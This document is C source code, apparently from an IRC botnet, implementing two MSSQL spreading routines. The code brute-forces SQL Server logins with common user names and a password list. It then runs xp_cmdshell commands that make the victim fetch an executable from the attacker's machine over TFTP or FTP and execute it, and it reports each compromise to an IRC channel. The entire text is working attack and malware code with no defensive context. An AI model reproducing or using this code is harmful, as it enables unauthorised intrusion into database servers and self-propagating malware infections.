BOOL MSSQL(EXINFO exinfo)
{
char sendbuf[IRCLINE];
char database[]="", *users[]={"sa","root","admin",NULL};
BOOL bRet=FALSE;
SQLHANDLE hEnv;
SQLHDBC hDbc = SQL_NULL_HDBC;
SQLHSTMT hStmt = SQL_NULL_HSTMT;
SQLCHAR szOutConn[1024], constr[1024], command[1024];
SQLSMALLINT sLen;
if (fSQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnv) != SQL_SUCCESS)
return bRet;
if (fSQLSetEnvAttr(hEnv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
return bRet;
if (fSQLAllocHandle(SQL_HANDLE_DBC,hEnv,(SQLHDBC FAR*)&hDbc) != SQL_SUCCESS) {
fSQLFreeHandle(SQL_HANDLE_ENV, hEnv);
return bRet;
}
for (int i=0; users[i]; i++) {
for (int j=0; passwords[j]; j++) {
sprintf((char *)constr, "DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s",exinfo.ip,exinfo.port,users[i],passwords[j],database);
SQLRETURN nResult = fSQLDriverConnect(hDbc, NULL, constr, (SQLSMALLINT)strlen((char *)constr), szOutConn, 1024, &sLen, SQL_DRIVER_NOPROMPT);
if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO) {
fSQLAllocHandle(SQL_HANDLE_STMT,hDbc, &hStmt);
sprintf((char *)command,"EXEC master..xp_cmdshell 'tftp -i %s GET %s'", GetIP(exinfo.sock),filename);
if (fSQLExecDirect(hStmt, (SQLTCHAR*)&command, SQL_NTS) != SQL_SUCCESS) {
Sleep(300);
fSQLFreeHandle(SQL_HANDLE_STMT, hStmt);
fSQLAllocHandle(SQL_HANDLE_STMT,hDbc, &hStmt);
sprintf((char *)command,"EXEC master..xp_cmdshell '%s'", filename);
if (fSQLExecDirect(hStmt, (SQLTCHAR*)&command, SQL_NTS) == SQL_SUCCESS) {
bRet=TRUE;
_snprintf(sendbuf,sizeof(sendbuf),"[%s]: Exploiting IP: (%s:%d) User: (%s/%s).",
exploit[exinfo.exploit].name, exinfo.ip, exinfo.port, users[i], passwords[j]);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
}
fSQLFreeHandle(SQL_HANDLE_STMT, hStmt);
fSQLDisconnect(hDbc);
break;
}
Sleep(200);
}
if (bRet == TRUE)
break;
}
fSQLFreeHandle(SQL_HANDLE_DBC, hDbc);
fSQLFreeHandle(SQL_HANDLE_ENV, hEnv);
return bRet;
}
BOOL mssql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
char database[]="", *users[]={"sa","root","admin",NULL};
BOOL bRet=FALSE;
SQLHANDLE hEnv;
SQLHDBC hDbc = SQL_NULL_HDBC;
SQLHSTMT hStmt = SQL_NULL_HSTMT;
SQLCHAR szOutConn[1024], constr[1024], command[1024];
SQLSMALLINT sLen;
if (fSQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnv) != SQL_SUCCESS)
return bRet;
if (fSQLSetEnvAttr(hEnv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
return bRet;
if (fSQLAllocHandle(SQL_HANDLE_DBC,hEnv,(SQLHDBC FAR*)&hDbc) != SQL_SUCCESS) {
fSQLFreeHandle(SQL_HANDLE_ENV, hEnv);
return bRet;
}
for (int i=0; users[i]; i++) {
// if (exinfo.verbose)
// irc->privmsg(target,"%s %s: Trying IP: %s:%d, %s",scan_title, exploit[exinfo.exploit].name, exinfo.ip,exinfo.port, users[i]);
for (int j=0; mypasses[j]; j++) {
sprintf((char *)constr, "DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s",exinfo.ip,exinfo.port,users[i],mypasses[j],database);
SQLRETURN nResult = fSQLDriverConnect(hDbc, NULL, constr, (SQLSMALLINT)strlen((char *)constr), szOutConn, 1024, &sLen, SQL_DRIVER_NOPROMPT);
if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO) {
fSQLAllocHandle(SQL_HANDLE_STMT,hDbc, &hStmt);
// if (exinfo.verbose)
// irc->privmsg(target,"%s %s: Connected to IP: %s:%d",scan_title, exploit[exinfo.exploit].name, exinfo.ip,exinfo.port);
char fname[_MAX_FNAME];
sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
sprintf((char *)command,"EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user 1 1 >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq\r\n'",(PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname,fname);
if (fSQLExecDirect(hStmt, (SQLTCHAR*)&command, SQL_NTS) == SQL_SUCCESS) {
bRet=TRUE;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s:%d, %s/%s",scan_title, exploit[exinfo.exploit].name, exinfo.ip,exinfo.port, users[i], ((strcmp(mypasses[j],"")==0)?("(Blank)"):(mypasses[j])));
exploit[exinfo.exploit].stats++;
break;
}
fSQLFreeHandle(SQL_HANDLE_STMT, hStmt);
break;
}
Sleep(500);
}
if (bRet == TRUE)
break;
}
fSQLFreeHandle(SQL_HANDLE_DBC, hDbc);
fSQLFreeHandle(SQL_HANDLE_ENV, hEnv);
if (!bRet && !exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s:%d",scan_title, exploit[exinfo.exploit].name, exinfo.ip,exinfo.port);
return bRet;
}
